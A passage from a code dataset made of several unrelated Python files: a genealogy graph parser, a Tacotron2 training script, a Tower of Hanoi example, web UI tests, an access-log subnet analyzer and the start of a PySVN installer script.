family_names)\r\n\r\n # Nur wenn Nachname gefüllt\r\n if len(family_names) != 0:\r\n become_member_event = Event(\r\n self._graph,\r\n person,\r\n Nampi_type.Core.has_main_participant,\r\n label=\"Become family member\",\r\n )\r\n become_member_event.add_relationship(\r\n Nampi_type.Core.adds_aspect, aspect\r\n )\r\n become_member_event.add_relationship(\r\n Nampi_type.Core.changes_aspect_related_to, family\r\n )\r\n logging.debug(\"Added 'membership' in family \")\r\n\r\n self.__insert_di_act(\r\n become_member_event,\r\n (),\r\n authors,\r\n Entry.Source,\r\n Entry.Cite,\r\n self._d1,\r\n )\r\n\r\n # Tod\r\n\r\n # Exaktes Datum / Datum frühestens / Datum spätestens\r\n death = self.add_deaths(\r\n persName,\r\n (),\r\n Entry.Deathplace,\r\n Entry.DeathplaceGeo,\r\n Entry.Cite,\r\n datefirst,\r\n date,\r\n datelast,\r\n 
Entry.Source,\r\n )\r\n\r\n # Wenn Event vorhanden, schreiben\r\n if death:\r\n death.add_text(Entry.ExactCite, \"la\")\r\n self.__insert_di_act(\r\n death,\r\n (),\r\n authors,\r\n Entry.Source,\r\n Entry.Cite,\r\n self._d1,\r\n )\r\n\r\n cite = Entry.Cite\r\n # Titel\r\n if Entry.RelTitle:\r\n RelTitle = Event(\r\n self._graph,\r\n person,\r\n latest_date=date\r\n , label=\"Get title \" + Entry.RelTitle\r\n )\r\n RelTitle.add_text(Entry.ExactCite, \"la\")\r\n title = Title(\r\n self._graph, Entry.RelTitle, Nampi_type.Mona.religious_title\r\n )\r\n\r\n RelTitle.add_relationship(\r\n obj=person, pred=Nampi_type.Core.has_main_participant\r\n )\r\n RelTitle.add_relationship(\r\n obj=title, pred=Nampi_type.Core.adds_aspect\r\n )\r\n self.__insert_di_act(\r\n RelTitle,\r\n (),\r\n authors,\r\n Entry.Source,\r\n Entry.Cite,\r\n self._d1,\r\n )\r\n\r\n # Inits\r\n PlaceArray = \"\"\r\n PlaceGeoArray = \"\"\r\n GroupArray = \"\"\r\n StatusArray = \"\"\r\n StatusNampiArray = \"\"\r\n OccupationArray = \"\"\r\n OccupationNampiArray = \"\"\r\n EventArray = \"\"\r\n\r\n # Place\r\n if Entry.IssuePlace.find(\"%\"):\r\n PlaceArray = Entry.IssuePlace.split(\"%\")\r\n\r\n if str(Entry.IssuePlacegeo).find(\"%\"):\r\n PlaceGeoArray = str(Entry.IssuePlacegeo).split(\"%\")\r\n\r\n # Community\r\n if Entry.Community.find(\"%\"):\r\n GroupArray = Entry.Community.split(\"%\")\r\n\r\n # Status\r\n if Entry.Status.find(\"%\"):\r\n StatusArray = Entry.Status.split(\"%\")\r\n\r\n # Status Nampi\r\n if Entry.Status_Nampi.find(\"%\"):\r\n StatusNampiArray = Entry.Status_Nampi.split(\"%\")\r\n\r\n # Occupation\r\n if Entry.Occupation.find(\"%\"):\r\n OccupationArray = Entry.Occupation.split(\"%\")\r\n\r\n # Occupation_Nampi\r\n if Entry.Occupation_Nampi.find(\"%\"):\r\n OccupationNampiArray = Entry.Occupation_Nampi.split(\"%\")\r\n\r\n # Event\r\n if Entry.Event.find(\"%\"):\r\n EventArray = Entry.Event.split(\"%\")\r\n\r\n for (i, val) in enumerate(GroupArray):\r\n\r\n Group = 
self.__get_group(\r\n \"Monastic community\",\r\n GroupArray[i].replace('\"', \"\"),\r\n GroupArray[i].replace('\"', \"\"),\r\n )\r\n\r\n if len(PlaceArray) > i and len(PlaceGeoArray) > i:\r\n Place = self.__get_place(\r\n PlaceArray[i].strip(), PlaceGeoArray[i].split(\" \")[0]\r\n )\r\n strPlace = PlaceArray[i].strip()\r\n elif len(PlaceArray) > 0 and len(PlaceGeoArray) > 0:\r\n Place = self.__get_place(\r\n PlaceArray[-1].strip(), PlaceGeoArray[-1].split(\" \")[0]\r\n )\r\n strPlace = PlaceArray[-1].strip()\r\n else:\r\n Place = \"\"\r\n strPlace = \"\"\r\n\r\n if len(EventArray) > i:\r\n varEvent = EventArray[i]\r\n elif len(EventArray) > 0:\r\n varEvent = EventArray[-1]\r\n else:\r\n varEvent = \"\"\r\n\r\n if len(StatusArray) > i:\r\n varStatus = StatusArray[i]\r\n elif len(StatusArray) > 0:\r\n varStatus = StatusArray[-1]\r\n else:\r\n varStatus = \"\"\r\n\r\n if len(StatusNampiArray) > i:\r\n varStatusNampi = StatusNampiArray[i]\r\n elif len(StatusNampiArray) > 0:\r\n varStatusNampi = StatusNampiArray[-1]\r\n else:\r\n varStatusNampi = \"\"\r\n\r\n varStatusNampi = varStatusNampi.strip()\r\n if len(OccupationArray) > i is not None:\r\n varOccupation = OccupationArray[i]\r\n elif len(OccupationArray) > 0:\r\n varOccupation = OccupationArray[-1]\r\n\r\n if len(OccupationNampiArray) > i is not None:\r\n varOccupation_Nampi = OccupationNampiArray[i]\r\n elif len(OccupationNampiArray) > 0:\r\n varOccupation_Nampi = OccupationNampiArray[-1]\r\n\r\n if len(varStatusNampi.strip()) > 0:\r\n\r\n if self._stati.getValues()[varStatusNampi.strip()][\"Type\"]:\r\n type = self._stati.getValues()[varStatusNampi.strip()][\r\n \"Type\"\r\n ]\r\n\r\n varStatusType = _status_types[type]\r\n\r\n # if self._occupation.getValues()[varStatusNampi.strip()][\"Type\"]:\r\n # type = self._stati.getValues()[varOccupation_Nampi.strip()][\"Type\"]\r\n\r\n # varOccupationType = _occupation_types[type]\r\n\r\n event = None\r\n\r\n if len(date) > 0:\r\n\r\n event = Event(\r\n 
self._graph,\r\n person,\r\n Nampi_type.Core.has_main_participant,\r\n varEvent,\r\n (),\r\n Place,\r\n latest_date=date,\r\n )\r\n event.add_text(Entry.ExactCite, \"la\")\r\n\r\n elif len(datelast) > 0:\r\n\r\n event = Event(\r\n self._graph,\r\n person,\r\n Nampi_type.Core.has_main_participant,\r\n varEvent,\r\n (),\r\n Place,\r\n earliest_date=datefirst,\r\n latest_date=datelast,\r\n )\r\n event.add_text(Entry.ExactCite, \"la\")\r\n\r\n aspect_label = \"\"\r\n occupation_type = \"\"\r\n if (\r\n varStatusNampi or varOccupation_Nampi\r\n ) and varStatusNampi == varOccupation_Nampi:\r\n aspect_label == varOccupation_Nampi\r\n status_type = varStatusType\r\n occupation_type = \"\" # varOccupationType\r\n types: List[URIRef] = []\r\n if status_type:\r\n types.append(status_type)\r\n if occupation_type:\r\n types.append(occupation_type)\r\n\r\n if event is not None:\r\n aspect = Aspect(self._graph, aspect_label, types)\r\n\r\n event.add_relationship(\r\n obj=person, pred=Nampi_type.Core.has_main_participant\r\n )\r\n if Group:\r\n event.add_relationship(\r\n obj=Group,\r\n pred=Nampi_type.Core.changes_aspect_related_to,\r\n )\r\n event.add_relationship(\r\n obj=aspect, pred=Nampi_type.Core.adds_aspect\r\n )\r\n else:\r\n if len(varStatusNampi.strip()) > 0:\r\n status_type = varStatusType\r\n aspect_label == varOccupation_Nampi\r\n if event is not None:\r\n\r\n if status_type is None:\r\n status_type = Nampi_type.Core.aspect\r\n\r\n aspect = Aspect(\r\n self._graph, varStatusNampi, status_type\r\n )\r\n event.add_relationship(\r\n obj=person,\r\n pred=Nampi_type.Core.has_main_participant,\r\n )\r\n if Group:\r\n event.add_relationship(\r\n obj=Group,\r\n pred=Nampi_type.Core.changes_aspect_related_to,\r\n )\r\n event.add_relationship(\r\n obj=aspect, pred=Nampi_type.Core.adds_aspect\r\n )\r\n\r\n elif varOccupation_Nampi:\r\n occupation_type = \"\" # varOccupationType\r\n if event is not None:\r\n aspect = Aspect(\r\n self._graph, varOccupation_Nampi, 
occupation_type\r\n )\r\n event.add_relationship(\r\n obj=person,\r\n pred=Nampi_type.Core.has_main_participant,\r\n )\r\n if Group:\r\n event.add_relationship(\r\n obj=Group,\r\n pred=Nampi_type.Core.changes_aspect_related_to,\r\n )\r\n event.add_relationship(\r\n obj=aspect, pred=Nampi_type.Core.adds_aspect\r\n )\r\n\r\n if event:\r\n self.__insert_di_act(\r\n event,\r\n (),\r\n authors,\r\n Entry.Source,\r\n cite,\r\n self._d1,\r\n )\r\n\r\n print(\"Create entry: \" + persName + \" ready\")\r\n\r\n def __init__(self, graph: Nampi_graph):\r\n \"\"\"Initialize the class.\r\n\r\n Parameters:\r\n graph: The data graph.\r\n \"\"\"\r\n self._graph = graph\r\n today = date.today()\r\n self._d1 = today.strftime(\"%Y-%m-%d\")\r\n self._stati = GetTypesAndStati(\"Statuses\")\r\n self._occu = GetTypesAndStati(\"Occupations\")\r\n self.getEntities()\r\n\r\n def add_deaths(\r\n self,\r\n singleperson,\r\n deathday,\r\n deathplace,\r\n deathgeo,\r\n cite,\r\n deathearlist,\r\n deathexact,\r\n deathlatest,\r\n source,\r\n ):\r\n \"\"\"\r\n Add all death events from the deaths table.\r\n \"\"\"\r\n\r\n died_person = self.__get_person(singleperson, ())\r\n\r\n if not died_person:\r\n return\r\n death_place = self.__get_place(deathplace.strip(), deathgeo)\r\n\r\n if len(deathday) > 0:\r\n death = Death(self._graph, died_person, death_place, exact_date=deathexact)\r\n elif len(deathlatest) > 0:\r\n death = Death(\r\n self._graph,\r\n died_person,\r\n death_place,\r\n earliest_date=deathearlist,\r\n latest_date=deathlatest,\r\n )\r\n else:\r\n death = None\r\n\r\n if death:\r\n self.__insert_di_act(\r\n death,\r\n (),\r\n authors,\r\n source,\r\n cite,\r\n self._d1,\r\n )\r\n\r\n logging.info(\"Parsed the deaths\")\r\n\r\n def __get_group(\r\n self, group_type_desc, group_label: Optional[str], part_of_label\r\n ) -> Optional[Group]:\r\n if not group_label:\r\n return None\r\n group_type_label = group_label\r\n group_type = _group_types[group_type_desc]\r\n part_of_group = (\r\n 
self.__get_group(part_of_label, (), ()) if part_of_label else None\r\n )\r\n group = Group(self._graph, group_label, group_type)\r\n if part_of_group:\r\n group.add_relationship(Nampi_type.Core.is_part_of, part_of_group)\r\n return group\r\n\r\n def __get_person(\r\n self, person_label: Optional[str], gnd_id: Optional[str]\r\n ) -> Optional[Person]:\r\n\r\n if gnd_id and str(gnd_id).upper() != \"KEINE\":\r\n if str(gnd_id).find(\" \"):\r\n gnd_split = str(gnd_id).split(\" \")\r\n gnd_id_split = gnd_split[0]\r\n gnd = \"http://d-nb.info/gnd/\" + str(gnd_id_split).strip()\r\n else:\r\n gnd = \"http://d-nb.info/gnd/\" + str(gnd_id).strip()\r\n else:\r\n gnd = \"\"\r\n gender = \"\"\r\n\r\n return Person.optional(self._graph, person_label, gender, gnd)\r\n\r\n def __get_place(\r\n self, place_label: Optional[str], geoid: Optional[str]\r\n ) -> Optional[Place]:\r\n if geoid:\r\n geoname_id = str(geoid).strip()\r\n else:\r\n geoname_id = \"\"\r\n\r\n place_label = place_label.replace('\"', \"\")\r\n return Place.optional(self._graph, place_label.strip(), geoname_id, \"\")\r\n\r\n def __get_source_location(\r\n self, source_label: str, location_text: Optional[str]\r\n ) -> Source_location:\r\n source_type_text = \"Manuscript\"\r\n source_type = None\r\n if source_type_text == \"Manuscript\":\r\n source_type = Source_type.MANUSCRIPT\r\n elif source_type_text == \"Online Resource\":\r\n source_type = Source_type.ONLINE_RESOURCE\r\n if not source_type:\r\n raise ValueError(\r\n \"Could not find source type for '{}'\".format(source_type_text)\r\n )\r\n source = Source(self._graph, source_label, source_type)\r\n if len(location_text) > 0:\r\n return Source_location(self._graph, source, location_text)\r\n else:\r\n return source\r\n\r\n def __insert_di_act(\r\n self,\r\n event: Event,\r\n row: Series = pandas.Series(),\r\n author_label: str = \"\",\r\n source_label: str = \"\",\r\n source_location_label: str = \"\",\r\n interpretation_date_text: Optional[str] = None,\r\n ):\r\n 
author_label = author_label\r\n source_label = source_label\r\n source_location_label = source_location_label\r\n\r\n author = author_label # Author(self._graph, author_label)\r\n if not author:\r\n return None\r\n source_location = self.__get_source_location(\r\n source_label, source_location_label\r\n )\r\n interpretation_date = interpretation_date_text\r\n\r\n comment = None\r\n if comment:\r\n event.add_comment(comment)\r\n Di_act(\r\n self._graph,\r\n event,\r\n author,\r\n source_location,\r\n interpretation_date,\r\n )\r\n","sub_path":"parsers/nampi_by_josephis/nampi_data_entry_form_josephis.py","file_name":"nampi_data_entry_form_josephis.py","file_ext":"py","file_size_in_byte":26789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"68199693","text":"import os\nimport math\nimport time\nimport argparse\nimport traceback\nimport numpy as np\nimport tensorflow as tf\nfrom datetime import datetime\n\n\nfrom tfr_dset import TFDataSet\nfrom text import sequence_to_text\nfrom utils import audio, plot, infolog, ValueWindow, debug\n\nfrom sygst_hparams import hp\nfrom models.sygst_tacotron2 import Tacotron2SYGST\n\nlog = infolog.log\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\n\n\n_max_step = 500000\nhdfs_ckpts='hdfs://haruna/home/byte_speech_sv/user/caixiong/ckpts'\n\n# spec_length max = 1116\n# text length max = 99\n\n\ndef time_string():\n return datetime.now().strftime('%Y-%m-%d %H:%M')\n\n\ndef debug_data(batch=32, time_in=100, time_out=500):\n text_x = np.random.randint(0, 150, size=(batch, time_in), dtype=np.int32)\n mel = np.random.randn(batch, time_out, 80).astype(np.float32)\n spec = np.random.randn(batch, time_out, 1025).astype(np.float32)\n spec_len = np.random.randint(time_out // 2, time_out, size=batch, dtype=np.int32)\n aro_label = np.random.rand(batch, 2).astype(np.float32)\n val_label = np.random.rand(batch, 2).astype(np.float32)\n\n print('text_input:', text_x[0], 
'spec_len:', spec_len, sep='\\n')\n return text_x, mel, spec, spec_len, aro_label, val_label\n\n\ndef train(log_dir, args):\n checkpoint_path = os.path.join(hdfs_ckpts, log_dir, 'model.ckpt')\n log(hp.to_string(), is_print=False)\n log('Loading training data from: %s' % args.tfr_dir)\n log('Checkpoint path: %s' % checkpoint_path)\n log('Using model: sygst tacotron2')\n\n tf_dset = TFDataSet(hp, args.tfr_dir)\n feats = tf_dset.get_train_next()\n # Set up model:\n global_step = tf.Variable(0, name='global_step', trainable=False)\n training = tf.placeholder_with_default(True, shape=(), name='training')\n with tf.name_scope('model'):\n model = Tacotron2SYGST(hp)\n model(feats['inputs'],\n mel_inputs=feats['mel_targets'],\n spec_inputs=feats['linear_targets'],\n spec_lengths=feats['spec_lengths'],\n ref_inputs=feats['mel_targets'],\n ref_lengths=feats['spec_lengths'],\n arousal_labels=feats['soft_arousal_labels'],\n valence_labels=feats['soft_valance_labels'],\n training=training)\n \"\"\"\n text_x, mel_x, spec_x, spec_len, aro, val = debug_data(2, 5, 10)\n model(text_x, mel_x, spec_x, spec_len, mel_x, spec_len, aro, val, training=training)\n \"\"\"\n model.add_loss()\n model.add_optimizer(global_step)\n stats = model.add_stats()\n\n # Bookkeeping:\n step = 0\n time_window = ValueWindow(100)\n loss_window = ValueWindow(100)\n saver = tf.train.Saver(max_to_keep=50, keep_checkpoint_every_n_hours=2)\n\n # Train!\n config = tf.ConfigProto(allow_soft_placement=True,\n gpu_options=tf.GPUOptions(allow_growth=True))\n with tf.Session(config=config) as sess:\n try:\n summary_writer = tf.summary.FileWriter(log_dir, sess.graph)\n sess.run(tf.global_variables_initializer())\n if args.restore_step:\n # Restore from a checkpoint if the user requested it.\n restore_path = '%s-%s' % (checkpoint_path, args.restore_step)\n saver.restore(sess, restore_path)\n log('Resuming from checkpoint: %s' % restore_path, slack=True)\n else:\n log('Starting a new training run ...', slack=True)\n\n 
\"\"\"\n fetches = [global_step, model.optimize, model.loss, model.mel_loss, model.spec_loss,\n model.stop_loss, model.arousal_loss, model.valence_loss, model.mel_grad_norms_max,\n model.spec_grad_norms_max, model.stop_grad_norms_max, model.aro_grad_norms_max, model.val_grad_norms_max]\n \"\"\"\n fetches = [global_step, model.optimize, model.loss, model.mel_loss, model.spec_loss,\n model.stop_loss, model.arousal_loss, model.valence_loss]\n for _ in range(_max_step):\n start_time = time.time()\n sess.run(debug.get_ops())\n # step, _, loss, mel_loss, spec_loss, stop_loss, aro_loss, val_loss, mel_g, spec_g, stop_g, aro_g, val_g = sess.run(fetches)\n step, _, loss, mel_loss, spec_loss, stop_loss, aro_loss, val_loss = sess.run(fetches)\n time_window.append(time.time() - start_time)\n loss_window.append(loss)\n \"\"\"\n message = 'Step %-7d [%.3f sec/step,ml=%.3f,spl=%.3f,sl=%.3f,al=%.3f,vl=%.3f,mg=%.4f,spg=%.4f,sg=%.4f,ag=%.4f,vg=%.4f]' % (\n step, time_window.average, mel_loss, spec_loss, stop_loss, aro_loss, val_loss, mel_g, spec_g, stop_g, aro_g, val_g)\n \"\"\"\n message = 'Step %-7d [%.3f sec/step,ml=%.3f,spl=%.3f,sl=%.3f,al=%.3f,vl=%.3f]' % (\n step, time_window.average, mel_loss, spec_loss, stop_loss, aro_loss, val_loss)\n log(message, slack=(step % args.checkpoint_interval == 0))\n\n if loss > 100 or math.isnan(loss):\n log('Loss exploded to %.5f at step %d!' 
% (loss, step), slack=True)\n raise Exception('Loss Exploded')\n\n if step % args.summary_interval == 0:\n log('Writing summary at step: %d' % step)\n try:\n summary_writer.add_summary(sess.run(stats), step)\n except Exception as e:\n log(f'summary failed and ignored: {str(e)}')\n\n if step % args.checkpoint_interval == 0:\n log('Saving checkpoint to: %s-%d' % (checkpoint_path, step))\n saver.save(sess, checkpoint_path, global_step=step)\n log('Saving audio and alignment...')\n gt_mel, gt_spec, seq, mel, spec, align = sess.run([model.mel_targets[0], model.spec_targets[0],\n model.text_targets[0], model.mel_outputs[0],\n model.spec_outputs[0], model.alignment_outputs[0]])\n text = sequence_to_text(seq)\n wav = audio.inv_spectrogram(hp, spec.T)\n wav_path = os.path.join(log_dir, 'step-%d-audio.wav' % step)\n mel_path = os.path.join(log_dir, 'step-%d-mel.png' % step)\n spec_path = os.path.join(log_dir, 'step-%d-spec.png' % step)\n align_path = os.path.join(log_dir, 'step-%d-align.png' % step)\n info = '%s, %s, step=%d, loss=%.5f\\n %s' % (args.model, time_string(), step, loss, text)\n plot.plot_alignment(align, align_path, info=info)\n plot.plot_mel(mel, mel_path, info=info, gt_mel=gt_mel)\n plot.plot_mel(spec, spec_path, info=info, gt_mel=gt_spec)\n audio.save_wav(hp, wav, wav_path)\n log('Input: %s' % text)\n\n except Exception as e:\n log('Exiting due to exception: %s' % e, slack=True)\n traceback.print_exc()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu', default='0')\n parser.add_argument('--log', '-l', default='')\n parser.add_argument('--restore_step', '-r', default=None)\n parser.add_argument('--tfr_dir', default='bc2013/training/tfrs_with_emo_feature')\n args = parser.parse_args()\n\n args.model = 'sygst_taco2'\n args.summary_interval = 200\n args.checkpoint_interval = 5000\n # args.summary_interval = 2\n # args.checkpoint_interval = 5\n\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = 
args.gpu\n log_dir = 'sygst_logs' + ('_' + args.log if args.log else '')\n os.makedirs(log_dir, exist_ok=True)\n\n tf.set_random_seed(hp.random_seed)\n infolog.init(os.path.join(log_dir, 'train.log'), args.model)\n\n train(log_dir, args)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sygst_train.py","file_name":"sygst_train.py","file_ext":"py","file_size_in_byte":8065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"30662993","text":"iteration = 0\ndef hanoi(N, A, C, B,iteration):\n\n if N==0: return\n\n hanoi(N - 1, A, B, C,iteration)\n\n print(\"Move the disk \",N,\" from \",A,\" to \",C)\n\n hanoi(N - 1, B, C, A,iteration)\n\nhanoi(3,'A','C','B',0)","sub_path":"towerOfHanoi.py","file_name":"towerOfHanoi.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441233409","text":"from . import test_image\nimport requests_mock\nimport pytest # noqa\nimport re\n\n\ndef test_home(client):\n rv = client.get(\"http://localhost:4000/\")\n b_true_chr = re.search(rv.data.decode(\"utf-8\")[726:760], \"1\")\n b_true_pos = re.search(rv.data.decode(\"utf-8\")[889:892], \"1\")\n b_true_ref = re.search(rv.data.decode(\"utf-8\")[1010:1017], \"A\")\n b_true_alt = re.search(rv.data.decode(\"utf-8\")[1137:1144], \"A\")\n\n b_false_chr = re.search(rv.data.decode(\"utf-8\")[726:760], \"Z\")\n b_false_ref = re.search(rv.data.decode(\"utf-8\")[1010:1017], \"Z\")\n b_false_alt = re.search(rv.data.decode(\"utf-8\")[1137:1144], \"Z\")\n\n assert b_true_chr\n assert b_true_pos\n assert b_true_ref\n assert b_true_alt\n\n assert b_false_chr is None\n assert b_false_ref is None\n assert b_false_alt is None\n\n assert \"Beacon\" in rv.data.decode(\"utf-8\")\n assert \"SWP\" in rv.data.decode(\"utf-8\")\n assert \"Submit\" in rv.data.decode(\"utf-8\")\n assert rv.status_code == 200\n\n\ninput_handle_correct = [\n ({\"chr\": \"1\", \"pos\": 
\"1\", \"ref\": \"A\", \"alt\": \"A\", \"occ\": True, \"error\": None}),\n ({\"chr\": \"1\", \"pos\": \"1\", \"ref\": \"A\", \"alt\": \"A\", \"occ\": False, \"error\": None}),\n ({\"chr\": \"1\", \"pos\": \"1\", \"ref\": \"A\", \"alt\": \"A\", \"occ\": None, \"error\": None}),\n (\n {\n \"chr\": \"1\",\n \"pos\": \"1\",\n \"ref\": \"A\",\n \"alt\": \"A\",\n \"occ\": True,\n \"error\": None,\n \"statistic\": test_image.IMG_B64,\n }\n ),\n (\n {\n \"chr\": \"1\",\n \"pos\": \"1\",\n \"ref\": \"A\",\n \"alt\": \"A\",\n \"occ\": True,\n \"error\": None,\n \"statistic\": None,\n }\n ),\n]\n\n\n@pytest.mark.parametrize(\"outdic\", input_handle_correct)\n@requests_mock.Mocker(kw=\"mock\")\ndef test_handle_correct(outdic, client, monkeypatch, demo_db_path, **kwargs):\n kwargs[\"mock\"].post(\"http://localhost:5000/query\", json=outdic)\n\n rv = client.post(\n \"http://localhost:4000/results\",\n data={\"token\": \"\", \"chr\": \"1\", \"pos\": \"1\", \"ref\": \"A\", \"alt\": \"A\"},\n follow_redirects=True,\n )\n assert rv.status_code == 200\n assert b\"Results\" in rv.data\n assert (\n b\"Your variant 1-1-A-A was found.\"\n or b\"Your variant 1-1-A-A was not found.\"\n or b\"An Error has occured: no such table: variants\" in rv.data\n )\n assert b\"go Home\" in rv.data\n\n rt = client.post(\n \"/results\",\n data={\"token\": \"ValidToken\", \"chr\": \"1\", \"pos\": \"1\", \"ref\": \"A\", \"alt\": \"A\"},\n )\n assert b\"Results\" in rt.data\n assert (\n b\"Your variant 1-1-A-A was found.\"\n or b\"Your variant 1-1-A-A was not found.\"\n or b\"An Error has occured: no such table: variants\" in rt.data\n )\n assert b\"go Home\" in rt.data\n assert rt.status_code == 200\n\n\ninput_login = [\n (\"Valid\", \"ValidToken\", True, None),\n (None, \"NoneValidToken\", False, None),\n (None, \"ErrorToken\", None, \"Error\"),\n (None, None, None, \"Error\"),\n]\n\n\n@pytest.mark.parametrize(\"username,token,valid,error\", input_login)\n@requests_mock.Mocker(kw=\"mock\")\ndef 
test_login(username, token, valid, error, client, **kwargs):\n kwargs[\"mock\"].post(\n \"http://localhost:5000/api/verify\",\n json={\"verified\": valid, \"user\": username, \"error\": error},\n )\n rv = client.post(\"/login\", data=dict(token=token), follow_redirects=True)\n assert rv.status_code == 200\n assert b\"SWP\" in rv.data\n assert b\"Beacon\" in rv.data\n assert b\"Login\" in rv.data\n\n rg = client.get(\"/login\")\n assert rg.status_code == 200\n assert b\"SWP\" in rg.data\n assert b\"Beacon\" in rg.data\n assert b\"Login\" in rg.data\n assert b\"Cancel\" in rg.data\n","sub_path":"tests/test_web_ui.py","file_name":"test_web_ui.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"289791687","text":"#11. b, f, h\nliczba1=5\nliczba2=1\nliczba3=8\nliczba4=6\nliczba5=3\nsuma =(liczba1**2+liczba2**2+liczba3**2+liczba4**2+liczba5**2)\nprint (\"Odpowiedź do b: \")\nprint (suma)\n\n","sub_path":"01-TypesAndVariables/During Class/program4.py","file_name":"program4.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"370897336","text":"import re\nimport collections\n\nsubnets = {}\nIPsList = []\nsubnetsList = []\n\nsecureRegex = \"\\n((([01][0-9][0-9]|2[0-4][0-9]|25[0-5]|[0-9][0-9]|[0-9])\\.([01][0-9][0-9]|2[0-4][0-9]|25[0-5]|[0-9][0-9]|[0-9])\\.([01][0-9][0-9]|2[0-4][0-9]|25[0-5]|[0-9][0-9]|[0-9]))\\.([01][0-9][0-9]|2[0-4][0-9]|25[0-5]|[0-9][0-9]|[0-9]))\"\nlightRegex = \"\\n(([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})\\.[0-9]{1,3})\"\n\nlogFile = open('access.log')\nlog = ''.join(('\\n', logFile.read()))\n\nIPs=re.findall(r'\\n(([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})\\.[0-9]{1,3})', log)\n\nfor i in range(len(IPs)):\n isPresent = 0\n for j in range(len(IPsList)):\n if IPsList[j] == IPs[i][0]:\n isPresent = 1\n\n if (isPresent == 0):\n IPsList.append(IPs[i][0])\n 
subnetsList.append(IPs[i][1])\nprint(\"Unique IPs found: \"+ str(len(IPsList)))\n\n# subnets = dict(zip(subnetsList,IPsList))\nfor k,v in zip(subnetsList, IPsList):\n subnets.setdefault(k, []).append(v)\n\noutput = open('output.txt', 'w')\noutput.write(\"Found \" + str(len(IPsList)) + \" unique IPs (total: \" + str(len(IPs)) + \") and \" + str(len(subnets)) + \" \\24 subnets. \\r\\n\")\n\nfor subnet in subnets:\n output.write(\"%s\\n\" % subnet)\n for ip in subnets[subnet]:\n output.write(\"\\t%s\\n\" % ip)","sub_path":"analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"455374805","text":"#!/usr/bin/env python\n#\n# Simplifies installation of PySVN, working through platform and other\n# compatibility differences.\n#\n# By default, this will install a wheel for the latest version of PySVN.\n\nfrom __future__ import print_function, unicode_literals\n\nimport argparse\nimport atexit\nimport glob\nimport os\nimport platform\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tarfile\nimport tempfile\nfrom subprocess import CalledProcessError\n\ntry:\n # Python 3\n from urllib.error import URLError\n from urllib.request import urlopen, urlretrieve\nexcept ImportError:\n # Python 2\n from urllib import urlretrieve\n from urllib2 import URLError, urlopen\n\ntry:\n import pip\nexcept ImportError:\n sys.stderr.write('Install pip for Python %s.%s and try again.\\n'\n % sys.version_info[:2])\n sys.exit(1)\n\ntry:\n import wheel\nexcept ImportError:\n sys.stderr.write('Install wheel for Python %s.%s and try again.\\n'\n % sys.version_info[:2])\n sys.exit(1)\n\n\nINDEX_URL = 'https://sourceforge.net/projects/pysvn/rss?path=/pysvn&limit=10'\nDOWNLOAD_URL_MASK = (\n 'https://sourceforge.net/projects/pysvn/files/pysvn/V%(version)s/'\n 'pysvn-%(version)s.tar.gz/download')\nVERSION_RE = \\\n 
re.compile(br'.*/files/pysvn/V(?P[0-9\\.-]+)/.*')\n\n\ncwd = None\ntemp_path = None\n_debug_mode = (os.environ.get('DEBUG_PYSVN_INSTALLER') == '1')\n\n\ndef destroy_temp():\n shutil.rmtree(temp_path)\n\n\ndef debug(msg):\n if _debug_mode:\n sys.stderr.write(msg)\n\n\ndef get_pysvn_version():\n try:\n data = urlopen(INDEX_URL).read()\n except URLError as e:\n sys.stderr.write('Unable to fetch PySVN downloads RSS feed: %s\\n' % e)\n sys.stderr.write('Tried to load feed from %s\\n' % INDEX_URL)\n sys.exit(1)\n\n m = VERSION_RE.search(data)\n\n if not m:\n sys.stderr.write('Unable to find latest PySVN version in RSS feed.\\n')\n sys.stderr.write('Please report to support@beanbaginc.com.\\n')\n sys.exit(1)\n\n return m.groups('version')[0].decode('utf-8')\n\n\ndef fetch_pysvn(pysvn_version):\n url = DOWNLOAD_URL_MASK % {\n 'version': pysvn_version,\n }\n\n debug('PySVN URL: %s\\n' % url)\n\n tarball_path = os.path.join(temp_path, 'pysvn.tar.gz')\n\n try:\n urlretrieve(url, filename=tarball_path)\n except URLError as e:\n sys.stderr.write('Unable to fetch PySVN %s: %s\\n' % (pysvn_version, e))\n sys.stderr.write('Please report to support@beanbaginc.com.\\n')\n sys.exit(1)\n\n return tarball_path\n\n\ndef extract_pysvn(tarball_path):\n with tarfile.open(tarball_path) as tar:\n tar.extractall(temp_path)\n\n try:\n return glob.glob(os.path.join(temp_path, 'pysvn-*'))[0]\n except IndexError:\n sys.stderr.write('Unable to find pysvn-* directory in tarball.\\n')\n sys.stderr.write('Please report to support@beanbaginc.com.\\n')\n sys.exit(1)\n\n\ndef get_brew_prefix(package):\n try:\n path = (\n subprocess.check_output(['brew', '--prefix', package])\n .strip()\n .decode('utf-8')\n )\n debug('%s was found in brew: %s\\n' % (package, path))\n\n return path\n except CalledProcessError:\n debug('%s was not found in brew\\n' % package)\n return None\n\n\ndef build_pysvn(src_path, install=True):\n system = platform.system()\n\n os.chdir(src_path)\n\n # Locate the PyCXX Import 
